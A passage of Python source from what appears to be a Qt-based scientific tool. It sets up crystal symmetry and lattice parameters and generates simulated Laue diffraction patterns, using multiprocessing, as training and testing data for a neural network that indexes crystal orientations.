elif self.input_params["symmetry"] == "hexagonal":
self.SG = 191
elif self.input_params["symmetry"] == "orthorhombic":
self.SG = 47
elif self.input_params["symmetry"] == "tetragonal":
self.SG = 123
elif self.input_params["symmetry"] == "trigonal":
self.SG = 162
elif self.input_params["symmetry"] == "triclinic":
self.SG = 2
self.rules = dictLT.dict_Materials[self.material_][-1]
self.symmetry_name = self.input_params["symmetry"]
if self.input_params["symmetry"] =="cubic":
self.crystal = SGLattice(int(self.SG), a)
self.symmetry = Symmetry.cubic
self.lattice_material = Lattice.cubic(a)
elif self.input_params["symmetry"] =="monoclinic":
self.crystal = SGLattice(int(self.SG),a, b, c, beta)
self.symmetry = Symmetry.monoclinic
self.lattice_material = Lattice.monoclinic(a, b, c, beta)
elif self.input_params["symmetry"] == "hexagonal":
self.crystal = SGLattice(int(self.SG),a, c)
self.symmetry = Symmetry.hexagonal
self.lattice_material = Lattice.hexagonal(a, c)
elif self.input_params["symmetry"] == "orthorhombic":
self.crystal = SGLattice(int(self.SG),a, b, c)
self.symmetry = Symmetry.orthorhombic
self.lattice_material = Lattice.orthorhombic(a, b, c)
elif self.input_params["symmetry"] == "tetragonal":
self.crystal = SGLattice(int(self.SG),a, c)
self.symmetry = Symmetry.tetragonal
self.lattice_material = Lattice.tetragonal(a, c)
elif self.input_params["symmetry"] == "trigonal":
self.crystal = SGLattice(int(self.SG),a, alpha)
self.symmetry = Symmetry.trigonal
self.lattice_material = Lattice.rhombohedral(a, alpha)
elif self.input_params["symmetry"] == "triclinic":
self.crystal = SGLattice(int(self.SG),a, b, c, alpha, beta, gamma)
self.symmetry = Symmetry.triclinic
self.lattice_material = Lattice.triclinic(a, b, c, alpha, beta, gamma)
# self.symmetry.operation_rotation = self.crystal._hklsym
# self.lattice_material.sglattice = self.crystal
if self.material_ != self.material1_:
if self.SG1 == None:
if self.input_params["symmetry1"] =="cubic":
self.SG1 = 230
elif self.input_params["symmetry1"] =="monoclinic":
self.SG1 = 10
elif self.input_params["symmetry1"] == "hexagonal":
self.SG1 = 191
elif self.input_params["symmetry1"] == "orthorhombic":
self.SG1 = 47
elif self.input_params["symmetry1"] == "tetragonal":
self.SG1 = 123
elif self.input_params["symmetry1"] == "trigonal":
self.SG1 = 162
elif self.input_params["symmetry1"] == "triclinic":
self.SG1 = 2
self.symmetry1_name = self.input_params["symmetry1"]
a1, b1, c1, alpha1, beta1, gamma1 = dictLT.dict_Materials[self.material1_][1]
self.rules1 = dictLT.dict_Materials[self.material1_][-1]
if self.input_params["symmetry1"] =="cubic":
self.crystal1 = SGLattice(int(self.SG1), a1)
self.symmetry1 = Symmetry.cubic
self.lattice_material1 = Lattice.cubic(a1)
elif self.input_params["symmetry1"] =="monoclinic":
self.crystal1 = SGLattice(int(self.SG1),a1, b1, c1, beta1)
self.symmetry1 = Symmetry.monoclinic
self.lattice_material1 = Lattice.monoclinic(a1, b1, c1, beta1)
elif self.input_params["symmetry1"] == "hexagonal":
self.crystal1 = SGLattice(int(self.SG1),a1, c1)
self.symmetry1 = Symmetry.hexagonal
self.lattice_material1 = Lattice.hexagonal(a1, c1)
elif self.input_params["symmetry1"] == "orthorhombic":
self.crystal1 = SGLattice(int(self.SG1),a1, b1, c1)
self.symmetry1 = Symmetry.orthorhombic
self.lattice_material1 = Lattice.orthorhombic(a1, b1, c1)
elif self.input_params["symmetry1"] == "tetragonal":
self.crystal1 = SGLattice(int(self.SG1),a1, c1)
self.symmetry1 = Symmetry.tetragonal
self.lattice_material1 = Lattice.tetragonal(a1, c1)
elif self.input_params["symmetry1"] == "trigonal":
self.crystal1 = SGLattice(int(self.SG1),a1, alpha1)
self.symmetry1 = Symmetry.trigonal
self.lattice_material1 = Lattice.rhombohedral(a1, alpha1)
elif self.input_params["symmetry1"] == "triclinic":
self.crystal1 = SGLattice(int(self.SG1),a1, b1, c1, alpha1, beta1, gamma1)
self.symmetry1 = Symmetry.triclinic
self.lattice_material1 = Lattice.triclinic(a1, b1, c1, alpha1, beta1, gamma1)
# self.symmetry1.operation_rotation = self.crystal1._hklsym
# self.lattice_material1.sglattice = self.crystal1
else:
self.rules1 = None
self.symmetry1 = None
self.lattice_material1 = None
self.crystal1 = None
self.symmetry1_name = self.input_params["symmetry"]
self.modelp = "random"
### Load texture files based on symmetry
if self.input_params["texture"] == "in-built_Uniform_Distribution":
self.write_to_console("Using uniform distribution generated with Neper for Training dataset \n")
self.modelp = "uniform"
elif self.input_params["texture"] == "random":
self.write_to_console("Using random orientation distribution for Training dataset \n")
self.modelp = "random"
else:
self.modelp = "experimental"
self.write_to_console("# User defined texture to be used: TODO \n")
try:
if not os.path.exists(self.save_directory):
os.makedirs(self.save_directory)
except:
if self.material_ == self.material1_:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+self.input_params["prefix"]
else:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+"_"+self.input_params["material1_"]+self.input_params["prefix"]
if not os.path.exists(self.save_directory):
os.makedirs(self.save_directory)
self.write_to_console("Working directory :"+ self.save_directory)
## Global log file
now = datetime.datetime.fromtimestamp(GUI_START_TIME)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
if self.material_ == self.material1_:
self.text_file_log = open(self.save_directory+"//log_"+self.material_+".txt", "a")
else:
self.text_file_log = open(self.save_directory+"//log_"+self.material_+"_"+self.material1_+".txt", "a")
self.text_file_log.write("# Log file created at "+ c_time + "\n")
def temp_HKL(self, removeharmonics=1):
material_= self.input_params["material_"]
nbgrains = self.input_params["nb_grains_per_lp"]
nbtestspots = 0
hkl_sol_all = np.zeros((1,4))
verbose=0
for _ in range(10):
seednumber = np.random.randint(1e6)
tabledistancerandom, hkl_sol, \
_, _, _, _, _ = self.prepare_LP(nbgrains, 0,
material_,
None,
verbose,
plotLauePattern=False,
seed=seednumber,
detectorparameters=self.input_params["detectorparameters"],
pixelsize=self.input_params["pixelsize"],
dim1=self.input_params["dim1"],
dim2=self.input_params["dim2"],
removeharmonics=removeharmonics)
spots_in_center = [sp for sp in range(len(tabledistancerandom))] # take all spots in Laue pattern
hkl_sol_all = np.vstack((hkl_sol_all, hkl_sol))
nbtestspots = nbtestspots + len(spots_in_center)
if self.material_ != self.material1_:
copy1 = np.copy(int(np.max(np.abs(hkl_sol_all))))
copy1_min = np.copy(int(np.min(hkl_sol_all)))
material_= self.input_params["material1_"]
nbgrains = self.input_params["nb_grains_per_lp1"]
hkl_sol_all = np.zeros((1,4))
verbose=0
for _ in range(10):
seednumber = np.random.randint(1e6)
tabledistancerandom, hkl_sol, \
_, _, _, _, _ = self.prepare_LP(nbgrains, 0,
material_,
None,
verbose,
plotLauePattern=False,
seed=seednumber,
detectorparameters=self.input_params["detectorparameters"],
pixelsize=self.input_params["pixelsize"],
dim1=self.input_params["dim1"],
dim2=self.input_params["dim2"],
removeharmonics=removeharmonics)
spots_in_center = list(range(len(tabledistancerandom))) # take all spots in the Laue pattern
hkl_sol_all = np.vstack((hkl_sol_all, hkl_sol))
nbtestspots = nbtestspots + len(spots_in_center)
hkl_sol_all = np.delete(hkl_sol_all, 0, axis =0)
copy_ = np.copy(int(np.max(np.abs(hkl_sol_all))))
copy_min_ = np.copy(int(np.min(hkl_sol_all)))
self.write_to_console("Total spots created for calculating HKL bounds:"+str(nbtestspots))
self.write_to_console("Max HKL index for "+self.material_+" :"+str(copy1))
self.write_to_console("Min HKL index "+self.material_+" :"+str(copy1_min))
self.write_to_console("Max HKL index for "+self.material1_+" :"+str(copy_))
self.write_to_console("Min HKL index "+self.material1_+" :"+str(copy_min_))
return int(copy1), int(copy_)
self.write_to_console("Total spots created for calculating HKL bounds:"+str(nbtestspots))
self.write_to_console("Max HKL index:"+str(np.max(hkl_sol_all)))
self.write_to_console("Min HKL index:"+str(np.min(hkl_sol_all)))
return int(np.max(np.abs(hkl_sol_all))), int(np.max(np.abs(hkl_sol_all)))
def prepare_LP(self, nbgrains, nbgrains1, material_, material1_, verbose, plotLauePattern, seed=None, sortintensity=False,
detectorparameters=None, pixelsize=None, dim1=2048, dim2=2048, removeharmonics=1):
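# Simulate Laue pattern(s) for the requested number of grains (simulatemultiplepatterns) and
# return the pairwise angular-distance table between all spots together with the ground-truth
# HKLs, spot positions, intensities and scattering angles (2theta, chi).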
s_tth, s_chi, s_miller_ind, s_posx, s_posy, \
s_intensity, _, _ = simulatemultiplepatterns(nbgrains, nbgrains1, seed=seed,
key_material=material_,
key_material1=material1_,
detectorparameters=detectorparameters,
pixelsize=pixelsize,
emin=self.emin,
emax=self.emax,
sortintensity=sortintensity,
dim1=dim1,dim2=dim2,
removeharmonics=removeharmonics,
misorientation_angle=1,
phase_always_present=None)
# considering all spots
allspots_the_chi = np.transpose(np.array([s_tth/2., s_chi]))
tabledistancerandom = np.transpose(GT.calculdist_from_thetachi(allspots_the_chi, allspots_the_chi))
# ground truth
hkl_sol = s_miller_ind
return tabledistancerandom, hkl_sol, s_posx, s_posy, s_intensity, s_tth, s_chi
def load_dataset(self, material_="Cu", material1_="Cu", ang_maxx=18.,step=0.1, mode=0,
nb_grains=1, nb_grains1=1, grains_nb_simulate=100, data_realism = False,
detectorparameters=None, pixelsize=None, type_="training",
var0 = 0, dim1=2048, dim2=2048, removeharmonics=1):
"""
Generate simulated Laue-pattern training or testing datasets for the configured material(s); works for all symmetries.
"""
## make sure directory exists
save_directory_ = self.save_directory+"//"+type_
if not os.path.exists(save_directory_):
os.makedirs(save_directory_)
try:
with open(self.save_directory+"//classhkl_data_"+material_+".pickle", "rb") as input_file:
classhkl, _, _, n, _, \
hkl_all_class, _, lattice_material, symmetry = cPickle.load(input_file)
max_millerindex = int(n)
max_millerindex1 = int(n)
if material_ != material1_:
with open(self.save_directory+"//classhkl_data_"+material1_+".pickle", "rb") as input_file:
classhkl1, _, _, n1, _, \
hkl_all_class1, _, lattice_material1, symmetry1 = cPickle.load(input_file)
max_millerindex1 = int(n1)
except:
self.write_to_console("Class HKL library data not found, please run it first")
return None
if var0==1:
codebars, angbins = get_material_data(material_ = material_, ang_maxx = ang_maxx, step = step,
hkl_ref=n, classhkl=classhkl)
loc = np.array([ij for ij in range(len(classhkl))])
self.write_to_console("Verifying if two different HKL class have same angular distribution (can be very time consuming depending on the symmetry)")
index = []
self.progress.setMaximum(len(codebars))
list_appended = []
count_cbs = 0
for i, j in enumerate(codebars):
for k, l in enumerate(codebars):
# if i in list_appended and k in list_appended:
# continue
if i != k and np.all(j == l):
index.append((i,k))
string0 = "HKL's "+ str(classhkl[i])+" and "+str(classhkl[k])+" have exactly the same angular distribution."
self.write_to_console(string0)
list_appended.append(i)
list_appended.append(k)
count_cbs += 1
self.progress.setValue(count_cbs)
QApplication.processEvents()
if len(index) == 0:
self.write_to_console("Great! No two HKL class have same angular distribution")
#np.savez_compressed(save_directory_+'//grain_init.npz', codebars, loc)
else:
self.write_to_console("Some HKL's have similar angular distribution; this will likely reduce the accuracy of the neural network; verify if symmetry matrix and other parameters are properly configured; this is just for the dictionary; keep eye on the dataset being generated for training")
self.write_to_console("This is likely the result of the symmetry operation available in a user_defined space group; this shouldn't affect the general accuracy of the model")
np.savez_compressed(self.save_directory+'//conflict_angular_distribution_debug.npz', codebars, index)
np.savez_compressed(self.save_directory+'//grain_classhkl_angbin.npz', classhkl, angbins)
if material_ != material1_:
codebars, angbins = get_material_data(material_ = material1_, ang_maxx = ang_maxx, step = step,
hkl_ref=n1, classhkl=classhkl1)
ind_offset = loc[-1] + 1
loc = np.array([ind_offset + ij for ij in range(len(classhkl1))])
self.write_to_console("Verifying if two different HKL class have same angular distribution (can be very time consuming depending on the symmetry)")
index = []
self.progress.setMaximum(len(codebars))
list_appended = []
count_cbs = 0
for i, j in enumerate(codebars):
for k, l in enumerate(codebars):
# if i in list_appended and k in list_appended:
# continue
if i != k and np.all(j == l):
index.append((i,k))
string0 = "HKL's "+ str(classhkl1[i])+" and "+str(classhkl1[k])+" have exactly the same angular distribution."
self.write_to_console(string0)
list_appended.append(i)
list_appended.append(k)
count_cbs += 1
self.progress.setValue(count_cbs)
QApplication.processEvents()
if len(index) == 0:
self.write_to_console("Great! No two HKL class have same angular distribution")
#np.savez_compressed(save_directory_+'//grain_init1.npz', codebars, loc)
else:
self.write_to_console("Some HKL's have similar angular distribution; this will likely reduce the accuracy of the neural network; verify if symmetry matrix and other parameters are properly configured; this is just for the dictionary; keep eye on the dataset being generated for training")
self.write_to_console("This is likely the result of the symmetry operation available in a user_defined space group; this shouldn't affect the general accuracy of the model")
np.savez_compressed(self.save_directory+'//conflict_angular_distribution1_debug.npz', codebars, index)
np.savez_compressed(self.save_directory+'//grain_classhkl_angbin1.npz', classhkl1, angbins)
## make comprehensive list of dictionary
normal_hkl_ = np.zeros((1,3))
for j in hkl_all_class.keys():
normal_hkl_ = np.vstack((normal_hkl_, hkl_all_class[j]["family"]))
normal_hkl = np.delete(normal_hkl_, 0, axis =0)
if material_ != material1_:
normal_hkl1_ = np.zeros((1,3))
for j in hkl_all_class1.keys():
normal_hkl1_ = np.vstack((normal_hkl1_, hkl_all_class1[j]["family"]))
normal_hkl1 = np.delete(normal_hkl1_, 0, axis =0)
index_hkl = [j for j,k in enumerate(hkl_all_class.keys()) for i in range(len(hkl_all_class[k]["family"]))]
if material_ != material1_:
ind_offset = index_hkl[-1] + 1
index_hkl1 = [ind_offset+j for j,k in enumerate(hkl_all_class1.keys()) for i in range(len(hkl_all_class1[k]["family"]))]
if material_ == material1_:
index_hkl1 = None
normal_hkl1 = None
classhkl1 = None
hkl_all_class1 = None
lattice_material1 = None
symmetry1 = None
self.write_to_console("Generating "+type_+" and saving them")
if material_ != material1_:
nb_grains_list = list(range(nb_grains+1))
nb_grains1_list = list(range(nb_grains1+1))
list_permute = list(itertools.product(nb_grains_list, nb_grains1_list))
list_permute.pop(0)
max_progress = len(list_permute)*grains_nb_simulate
if self.matrix_phase_always_present is not None and type_ != "testing_data":
dummy_, key_material_new = self.matrix_phase_always_present.split(';')
if key_material_new == material_:
max_progress = len(list_permute)*grains_nb_simulate + (len(nb_grains1_list)-1)*grains_nb_simulate
else:
max_progress = len(list_permute)*grains_nb_simulate + (len(nb_grains_list)-1)*grains_nb_simulate
else:
max_progress = nb_grains*grains_nb_simulate
if self.matrix_phase_always_present is not None and type_ != "testing_data":
max_progress = nb_grains*grains_nb_simulate*2
if self.include_scm:
max_progress = max_progress + grains_nb_simulate
if material_ != material1_:
max_progress = max_progress + 2*grains_nb_simulate
self.progress.setMaximum(max_progress)
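# Distribute the simulation jobs over self.ncpu worker processes: each worker pulls chunks of
# job descriptions from _inputs_queue (target function: worker_generation) and reports its
# progress through _outputs_queue, which is polled by update_data_mp via a Qt timer.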
self._inputs_queue = Queue()
self._outputs_queue = Queue()
self._worker_process = {}
for i in range(self.ncpu):
self._worker_process[i]= Process(target=worker_generation, args=(self._inputs_queue,
self._outputs_queue,
i+1),)
for i in range(self.ncpu):
self._worker_process[i].start()
time.sleep(0.1)
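# Two-phase case (material_ != material1_): build all (n, m) grain-count combinations of the two
# phases; single-phase case (else branch below): loop over 1..nb_grains grains. In "uniform"
# texture mode the pre-generated Neper orientations (uniform_orientations_2000.npz) are split
# 80/20 into training/testing pools and the array matching the Laue group of each symmetry is used.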
if material_ != material1_:
if self.modelp == "uniform":
if type_ =="training_data":
xlim, ylim = 0, int(0.8*2000)
else:
xlim, ylim = int(0.8*2000), 2000-1
path_array = resource_path("uniform_orientations_2000.npz")
arr = np.load(path_array)
if symmetry == symmetry.cubic:
odf_data = arr["arr_6"][xlim:ylim]
# print("Laue group 11")
elif symmetry == symmetry.hexagonal:
odf_data = arr["arr_5"][xlim:ylim]
# print("Laue group 9")
elif symmetry == symmetry.trigonal:
odf_data = arr["arr_4"][xlim:ylim]
# print("Laue group 7")
elif symmetry == symmetry.tetragonal:
odf_data = arr["arr_3"][xlim:ylim]
# print("Laue group 5")
elif symmetry == symmetry.orthorhombic:
odf_data = arr["arr_2"][xlim:ylim]
# print("Laue group 3")
elif symmetry == symmetry.monoclinic:
odf_data = arr["arr_1"][xlim:ylim]
# print("Laue group 2")
elif symmetry == symmetry.triclinic:
odf_data = arr["arr_0"][xlim:ylim]
# print("Laue group 1")
if symmetry1 == symmetry.cubic:
odf_data1 = arr["arr_6"][xlim:ylim]
# print("Laue group 11")
elif symmetry1 == symmetry.hexagonal:
odf_data1 = arr["arr_5"][xlim:ylim]
# print("Laue group 9")
elif symmetry1 == symmetry.trigonal:
odf_data1 = arr["arr_4"][xlim:ylim]
# print("Laue group 7")
elif symmetry1 == symmetry.tetragonal:
odf_data1 = arr["arr_3"][xlim:ylim]
# print("Laue group 5")
elif symmetry1 == symmetry.orthorhombic:
odf_data1 = arr["arr_2"][xlim:ylim]
# print("Laue group 3")
elif symmetry1 == symmetry.monoclinic:
odf_data1 = arr["arr_1"][xlim:ylim]
# print("Laue group 2")
elif symmetry1 == symmetry.triclinic:
odf_data1 = arr["arr_0"][xlim:ylim]
# print("Laue group 1")
## list of combination of training dataset
## to be seen if this improves the prediction quality
## increases time significantly to generate the data
nb_grains_list = list(range(nb_grains+1))
nb_grains1_list = list(range(nb_grains1+1))
list_permute = list(itertools.product(nb_grains_list, nb_grains1_list))
list_permute.pop(0) ## removing the 0,0 index
# Alternative idea: generate a database up to n-grain Laue patterns
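# Each entry appended to `values` below is one simulation job: grain counts for the two phases,
# energy range, detector geometry, binning parameters, the class-HKL dictionaries, augmentation
# flags (noisy_data / remove_peaks), a random seed and the output directory.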
values = []
for i in range(len(list_permute)):
ii, jj = list_permute[i]
for j in range(grains_nb_simulate):
if data_realism:
## split each simulation batch into quartiles with different augmentation (clean, noisy, peaks removed, both) to mimic real data
if j < grains_nb_simulate*0.25:
noisy_data = False
remove_peaks = False
elif (j >= grains_nb_simulate*0.25) and (j < grains_nb_simulate*0.5):
noisy_data = True
remove_peaks = False
elif (j >= grains_nb_simulate*0.5) and (j < grains_nb_simulate*0.75):
noisy_data = False
remove_peaks = True
elif (j >= grains_nb_simulate*0.75):
noisy_data = True
remove_peaks = True
else:
noisy_data = False
remove_peaks = False
if self.modelp == "uniform":
rand_choice = np.random.choice(len(odf_data), ii, replace=False)
rand_choice1 = np.random.choice(len(odf_data1), jj, replace=False)
data_odf_data = odf_data[rand_choice,:,:]
data_odf_data1 = odf_data1[rand_choice1,:,:]
else:
data_odf_data = None
data_odf_data1 = None
seednumber = np.random.randint(1e6)
values.append([ii, jj, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
if self.matrix_phase_always_present is not None and \
type_ != "testing_data":
dummy_, key_material_new = self.matrix_phase_always_present.split(';')
if key_material_new == material_ and ii == 0:
values.append([0, jj, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
self.matrix_phase_always_present])
elif key_material_new == material1_ and jj == 0:
values.append([ii, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
self.matrix_phase_always_present])
chunks = chunker_list(values, self.ncpu)
chunks_mp = list(chunks)
if self.include_scm:
meta = {'t1':time.time(),
'flag':0}
else:
meta = {'t1':time.time(),
'flag':1}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
else:
# Alternative idea: generate a database up to n-grain Laue patterns
if self.modelp == "uniform":
## training split
if type_ =="training_data":
xlim, ylim = 0, int(0.8*2000)
else:
xlim, ylim = int(0.8*2000), 2000-1
path_array = resource_path("uniform_orientations_2000.npz")
arr = np.load(path_array)
if symmetry == symmetry.cubic:
odf_data = arr["arr_6"][xlim:ylim]
print("Laue group 11")
elif symmetry == symmetry.hexagonal:
odf_data = arr["arr_5"][xlim:ylim]
print("Laue group 9")
elif symmetry == symmetry.trigonal:
odf_data = arr["arr_4"][xlim:ylim]
print("Laue group 7")
elif symmetry == symmetry.tetragonal:
odf_data = arr["arr_3"][xlim:ylim]
print("Laue group 5")
elif symmetry == symmetry.orthorhombic:
odf_data = arr["arr_2"][xlim:ylim]
print("Laue group 3")
elif symmetry == symmetry.monoclinic:
odf_data = arr["arr_1"][xlim:ylim]
print("Laue group 2")
elif symmetry == symmetry.triclinic:
odf_data = arr["arr_0"][xlim:ylim]
print("Laue group 1")
values = []
for i in range(nb_grains):
for j in range(grains_nb_simulate):
if data_realism:
## split each simulation batch into quartiles with different augmentation (clean, noisy, peaks removed, both) to mimic real data
if j < grains_nb_simulate*0.25:
noisy_data = False
remove_peaks = False
elif (j >= grains_nb_simulate*0.25) and (j < grains_nb_simulate*0.5):
noisy_data = True
remove_peaks = False
elif (j >= grains_nb_simulate*0.5) and (j < grains_nb_simulate*0.75):
noisy_data = False
remove_peaks = True
elif (j >= grains_nb_simulate*0.75):
noisy_data = True
remove_peaks = True
else:
noisy_data = False
remove_peaks = False
if self.modelp == "uniform":
rand_choice = np.random.choice(len(odf_data), i+1, replace=False)
data_odf_data = odf_data[rand_choice,:,:]
data_odf_data1 = None
else:
data_odf_data = None
data_odf_data1 = None
seednumber = np.random.randint(1e6)
values.append([i+1, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
if self.matrix_phase_always_present is not None and \
type_ != "testing_data":
values.append([i+1, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
self.matrix_phase_always_present])
chunks = chunker_list(values, self.ncpu)
chunks_mp = list(chunks)
if self.include_scm:
meta = {'t1':time.time(),
'flag':0}
else:
meta = {'t1':time.time(),
'flag':1}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
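# Optionally augment the dataset with nearly-single-crystal patterns containing small-angle
# misorientations (SCM). The integer after `removeharmonics` in each job (1, 2 or 3 below, 0 above)
# appears to select the SCM variant handled by worker_generation: material_ only, material1_ only,
# or a slightly misoriented bicrystal of the two phases (assumption based on how the jobs are built here).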
if self.include_scm:
self.write_to_console("Generating small angle misorientation single crystals")
values = []
for i in range(grains_nb_simulate):
if data_realism:
## split each simulation batch into quartiles with different augmentation (clean, noisy, peaks removed, both) to mimic real data
if i < grains_nb_simulate*0.25:
noisy_data = False
remove_peaks = False
elif (i >= grains_nb_simulate*0.25) and (i < grains_nb_simulate*0.5):
noisy_data = True
remove_peaks = False
elif (i >= grains_nb_simulate*0.5) and (i < grains_nb_simulate*0.75):
noisy_data = False
remove_peaks = True
elif (i >= grains_nb_simulate*0.75):
noisy_data = True
remove_peaks = True
else:
noisy_data = False
remove_peaks = False
seednumber = np.random.randint(1e6)
values.append([1, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
1, i, i, save_directory_,
None, None, self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
if material_ != material1_:
seednumber = np.random.randint(1e6)
values.append([0, 1, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
2, i, i, save_directory_,
None, None, self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
### include two slightly misoriented crystals of different materials
seednumber = np.random.randint(1e6)
values.append([1, 1, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
3, i, i, save_directory_,
None, None, self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
chunks = chunker_list(values, self.ncpu)
chunks_mp = list(chunks)
meta = {'t1':time.time(),
'flag':1}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
self.max_progress = max_progress
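# Block here until all worker processes have exited, updating the progress bar from
# self.update_progress (incremented by update_data_mp) while waiting.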
while True:
count = 0
for i in range(self.ncpu):
if not self._worker_process[i].is_alive():
self._worker_process[i].join()
count += 1
else:
time.sleep(0.1)
self.progress.setValue(self.update_progress)
QApplication.processEvents()
if count == self.ncpu:
self.progress.setValue(self.max_progress)
QApplication.processEvents()
return
def update_data_mp(self):
if not self._outputs_queue.empty():
self.timermp.blockSignals(True)
r_message = self._outputs_queue.get()
self.update_progress = self.update_progress + r_message
self.timermp.blockSignals(False)
def generate_training_data(self):
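# Full dataset-generation pipeline: determine HKL bounds (temp_HKL) when set to "auto", build the
# reference class-HKL library (generate_classHKL) for each phase, generate training and testing
# datasets with load_dataset via multiprocessing, optionally write MTEX orientation files, and
# finally report class occurrences (rmv_freq_class) before enabling the Train network button.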
### using MP libraries
self.ncpu = cpu_count_user
self.write_to_console("Using Multiprocessing ("+str(self.ncpu)+" cpus) for generation of simulated Laue patterns for training")
self._inputs_queue = Queue()
self._outputs_queue = Queue()
## Update data from multiprocessing
self.update_progress = 0
self.max_progress = 0
self.timermp = QtCore.QTimer()
self.timermp.setInterval(100) ## poll every 100 ms for progress updates from the worker processes
self.timermp.timeout.connect(self.update_data_mp)
self.timermp.start()
self.write_to_console("Generating training dataset")
self.status.showMessage("Training dataset generation in progress!")
if self.input_params["hkl_max_identify"] == "auto" and self.input_params["hkl_max_identify1"] != "auto":
self.write_to_console("Calculating the HKL bounds for training dataset")
self.n, _ = self.temp_HKL(removeharmonics=1)
elif self.input_params["hkl_max_identify"] == "auto" and self.input_params["hkl_max_identify1"] == "auto":
self.write_to_console("Calculating the HKL bounds for training dataset")
self.n, self.n1 = self.temp_HKL(removeharmonics=1)
elif self.input_params["hkl_max_identify"] != "auto" and self.input_params["hkl_max_identify1"] == "auto":
self.write_to_console("Calculating the HKL bounds for training dataset")
_, self.n1 = self.temp_HKL(removeharmonics=1)
## generate reference HKL library
self.write_to_console("Directory for training dataset is : "+self.save_directory)
## procedure for generation of GROUND TRUTH classes
# =============================================================================
# VERY IMPORTANT; TAKES Significant time; verify again for other symmetries
# =============================================================================
generate_classHKL(self.n, self.rules, self.lattice_material, self.symmetry, self.material_, \
self.crystal, self.SG, self.general_diff_rules, self.save_directory, \
self.write_to_console, self.progress, QApplication, self.maximum_angle_to_search, self.step_for_binning)
if self.material_ != self.material1_:
generate_classHKL(self.n1, self.rules1, self.lattice_material1, self.symmetry1, self.material1_, \
self.crystal1, self.SG1, self.general_diff_rules1, self.save_directory, \
self.write_to_console, self.progress, QApplication, self.maximum_angle_to_search, self.step_for_binning)
############ GENERATING TRAINING DATA
self.update_progress = 0
self.max_progress = 0
self.load_dataset(material_=self.material_, material1_=self.material1_, ang_maxx=self.maximum_angle_to_search,
step=self.step_for_binning, mode=self.mode_of_analysis,
nb_grains=self.nb_grains_per_lp,
grains_nb_simulate=self.grains_nb_simulate,
data_realism = True, detectorparameters=self.detectorparameters,
pixelsize=self.pixelsize, type_="training_data", var0=1,
dim1=self.input_params["dim1"], dim2=self.input_params["dim2"], removeharmonics=1)
# ############ GENERATING TESTING DATA
self.update_progress = 0
self.max_progress = 0
